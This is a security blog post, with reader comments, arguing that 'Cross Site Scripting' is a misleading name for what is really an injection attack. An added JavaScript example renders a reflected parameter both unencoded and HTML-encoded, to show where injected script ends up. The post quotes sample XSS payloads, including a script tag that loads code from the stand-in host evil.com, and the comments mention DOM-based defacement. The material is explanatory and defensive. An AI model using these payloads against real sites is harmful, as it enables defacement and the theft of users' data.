“Cross” just like in XSS

Just a hint: for some people the following blog entry may look like absolute nonsense :P

Some time ago a colleague of mine asked me why Cross Site Scripting is called that, because everything he had seen about it was injecting one's own script into a web application, so where is the "cross site" in that? From his point of view there is an HTML or script injection vulnerability, but it doesn't make any sense to call it XSS.
OK, so I had to answer, and I have to say that in many cases he is absolutely right: many of the things we call XSS today aren't really one. If you use something like <script src="http://evil.com/script.js">, the script comes from another site, so that is cross-site. But wait: when we can do that, most of the time we can also inject something like <script>alert(123);</script>, and here it is not really "cross site" at all, because the script sits directly in the HTML code of the vulnerable web application. Looking at this, we would have to name the type of vulnerability after the way someone exploits it, and that doesn't make sense at all.
So I had to find a definition for myself so that I could sleep well at night again. First of all: XSS is always an injection attack and nothing else. But for me the "cross" is not the problem; it is the "site" that makes no sense. Think of a normal temporary XSS launched via JavaScript in the URL: there we do have a "cross" from the URL input box of the browser into a new context, namely the vulnerable web application, but the source of the attack is not another site. So answering my colleague's question is easy, but now I have a much harder one: why is there a "site" in XSS?
It would, for example, be more correct to call it XSA, for Cross Scripting Attack, but that term is already taken by Cross Site Authentication, even if nobody uses that kind of attack as far as I know.
So my conclusion is that XSS is not a perfect term for this kind of attack, because to me it doesn't seem correct. But everyone out there, myself included, will keep calling it XSS out of habit, so nothing has to change, even if we know there is only one side and not two for a "cross".
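To make the argument above concrete from a defender's side, here is an added example (my own code, not from the original post): a tiny model of a page that reflects a URL parameter, once without and once with output encoding. The names escapeHtml, renderVulnerable, renderHardened, nameFromUrl, analyzeResponse and requestFor are my own, and the host example.test is a constructed placeholder. Both payloads quoted in the post (the inline alert and the external script reference) end up inside the vulnerable application's own document, served from that application's origin; encoding the parameter for the HTML text context turns both into inert text.

```javascript
// Added example, not code from the original post: a minimal reflected-XSS model
// showing the vulnerable render beside the hardened one. All function names are
// assumptions; "example.test" is a constructed placeholder host.

// Minimal encoder for the HTML *text* context (attribute, URL and JS contexts
// need their own encoders; this one is deliberately limited to text nodes).
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Server-side view: pull the "name" query parameter out of the request URL,
// exactly as a web framework would hand it to the handler (already URL-decoded).
function nameFromUrl(requestUrl) {
  return new URL(requestUrl).searchParams.get("name") || "";
}

// Vulnerable handler: the raw parameter is spliced into the page's own markup,
// so whatever it contains becomes part of the application's document.
function renderVulnerable(requestUrl) {
  const name = nameFromUrl(requestUrl);
  return `<html><body><p>Hello ${name}</p></body></html>`;
}

// Hardened handler: the same page, but the parameter is encoded for the
// context it lands in (an HTML text node).
function renderHardened(requestUrl) {
  const name = nameFromUrl(requestUrl);
  return `<html><body><p>Hello ${escapeHtml(name)}</p></body></html>`;
}

// Browser-side view: which origin the returned document belongs to, and whether
// a live <script> element is present in it (a regex heuristic, not an HTML parser).
function analyzeResponse(requestUrl, html) {
  return {
    origin: new URL(requestUrl).origin,
    scriptPresent: /<script\b/i.test(html),
  };
}

// Constructed request URLs carrying the two payloads quoted in the post.
const inlinePayload = "<script>alert(123);</script>";
const remotePayload = '<script src="http://evil.com/script.js"></script>';
function requestFor(payload) {
  return "http://example.test/hello?name=" + encodeURIComponent(payload);
}

// Walk through both payloads against both handlers.
for (const payload of [inlinePayload, remotePayload]) {
  const url = requestFor(payload);
  console.log("vulnerable:", analyzeResponse(url, renderVulnerable(url)));
  console.log("hardened:  ", analyzeResponse(url, renderHardened(url)));
  console.log("hardened body:", renderHardened(url));
}
```

Whichever payload is used, analyzeResponse reports the same origin (the vulnerable application's own) for the vulnerable render, which is the point of the post: from the browser's perspective the injected script is part of the site it was injected into, not of a second site. The fix does not care where the script would have been loaded from either; it only ensures the parameter can never leave the text context it was meant for.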

PS: Web-based worms are absolutely out of scope for this blog post, but of course there you can have "real" XSS ;)


7 Comments to ““Cross” just like in XSS”  

  1. Ory

    Hey,

    The XSS naming issue was raised several times before :-) Take a look at the Wikipedia XSS page:
    http://en.wikipedia.org/wiki/Cross_site_scripting

    “This issue isn’t just about scripting, and there isn’t necessarily anything cross-site about it. So why the name? It was coined earlier on when the problem was less understood, and it stuck. Believe me, we have had more important things to do than think of a better name.” (XSS pioneer Marc Slemko)

  2. Disenchant

    I didn’t see that before but it’s funny that other people asked the question about the name too, thanks for it :)

    PS: And of course Marc Slemko is right when he says “Believe me, we have had more important things to do than think of a better name.”

  3. nEUrOO

    Btw, I think that if you think about the attack and not the vulnerabilities, you have to have the “cross site” :)

  4. Disenchant

    Hi nEUrOO,
    Why do you think that? For example, a temporary XSS which you can exploit over a normal URL GET request doesn't need another site, for example to get cookies or something else. I think your point is that after an attack like this you have to send the victim to another site, or at least some of his data, to have a complete attack, and here you're right. But then we still have attack scenarios like site defacements through XSS, and here there is no other site involved. So I think an attacker will normally need at least one other site for doing a real attack most of the time, but still "cross site scripting" is, from my point of view, not the term which matches exactly what a XSS attack does. I'm interested in your point of view though :)

  5. nEUrOO

    Hum, you're right about the defacement with XSS, but I really used not to consider this a "real-important-whatever" attack; I mean... Well, at least as far as I know, you cannot totally deface a website with XSS (I mean only XSS, not DB storage etc. besides), but only modify your local view of the page, which someone may be able to see with a link (phishing).
    That's why I consider that the important attacks at least need another site to store scripts (worm), to send data (stealing information) etc.

    Maybe I missed something for the defacement thus I am waiting for your answer ;)

  6. Disenchant

    I don't agree with "you cannot totally deface a website with XSS", because with JavaScript we can access the DOM tree and so we can modify all the elements on a website, or, to make it extremely simple, we can just use innerHTML to rewrite the whole site content. Of course you can also do permanent XSSing, and at least then really nasty things can go on, for example if you modify the text of a political site during general elections or stuff like this ;)
    But of course I fully agree with you that most of the time, as I already wrote in my last comment, you'll need a second site for doing serious attacks. From my point of view, though, it's nonsense if we call one attack something different every time after the way it's exploited.

  7. nEUrOO

    You're absolutely right about the permanent XSS, I didn't even think about it :X
